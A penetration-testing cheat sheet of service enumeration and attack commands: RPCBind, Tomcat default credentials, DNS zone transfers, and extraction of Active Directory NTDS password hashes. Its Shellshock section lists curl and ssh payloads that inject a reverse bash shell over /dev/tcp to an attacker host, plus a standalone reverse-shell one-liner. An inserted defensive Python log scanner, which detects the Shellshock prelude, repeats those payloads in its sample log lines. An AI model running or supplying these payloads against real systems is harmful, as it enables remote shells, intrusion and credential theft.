Other Services Enumeration

RPCBind Port 111

rpcinfo -p x.x.x.x

Apache Tomcat Port 8080

default credentials: username tomcat, password s3cret

Port 4555

JAMES Remote Administration Tool 2.3.2

Shellshock Vulnerability

curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" TARGETADDRESS/cgi-bin/status
curl -x ip:PORT -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/ip/1234 0>&1" ip/cgi-bin/status
ssh username@IPADDRESS '() { :;}; /bin/bash'
$ python shellshock.py payload=reverse rhost=ip lhost=ip lport=4444 pages=/cgi-bin/user.sh
https://www.exploit-db.com/exploits/34900
bash -i >& /dev/tcp/ip/8888 0>&1
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/ip/1234 0>&1 " http://ip:80/cgi-bin/user.sh
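A defender-side check for the probes listed above, added here as an example and not part of the original notes: it scans Apache combined-format access log lines for the Bash function prelude "() {" that every Shellshock request above carries in a header, and flags whether the target path is a CGI handler. The sample log lines and addresses are constructed.

```python
import re
from dataclasses import dataclass

# Bash function-definition prelude abused by Shellshock (CVE-2014-6271 and
# follow-ups): "() {" with optional whitespace. Seen in any request header
# that a CGI handler exports into the environment (User-Agent, Referer, ...).
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent".
# Note: Apache escapes a literal quote in a header as \", which this simple
# [^"]* field pattern does not handle; such lines are skipped, not matched.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

@dataclass
class Hit:
    host: str
    path: str
    status: int
    field: str        # which logged header carried the prelude
    cgi_target: bool  # path under /cgi-bin/, i.e. a plausible CGI handler

def is_shellshock_probe(value: str) -> bool:
    """True when a header value contains the Shellshock function prelude."""
    return SHELLSHOCK_RE.search(value) is not None

def scan_access_log(text: str) -> list[Hit]:
    """Return one Hit per suspicious header in combined-format log text."""
    hits = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline should count these too
        request = m.group("request").split(" ")
        path = request[1] if len(request) >= 2 else request[0]
        for field in ("referer", "agent"):
            if is_shellshock_probe(m.group(field)):
                hits.append(Hit(m.group("host"), path, int(m.group("status")),
                                field, path.startswith("/cgi-bin/")))
    return hits

# Constructed sample log lines (not real traffic); lines 1 and 3 carry the probe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/10.0.0.9/1234 0>&1"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 "-" "() { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.0.0.9/1234 0>&1 "
10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "curl/7.68.0"
"""
```

A 200 on a CGI path with the prelude in a header deserves the same attention as a 500: the status alone does not tell you whether the injected command ran.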

Port 53

dnsrecon -r 127.0.0.0/24 -n ip
dig axfr @ip
dig axfr bank.htb @ip

DNS Zone Transfer

nslookup -> set type=any -> ls -d blah.com
dig axfr blah.com @ns1.blah.com
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

Active Directory / LDAP

./dsusers.py datatable link_table extract --lmoutfile LM.out --ntoutfile NT.out --passwordhashes --pwdformat john --syshive 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin

/usr/local/bin/esedbexport -m tables 20170721114636_default_192.x.x.x 33_psexec.ntdsgrab._333512.dit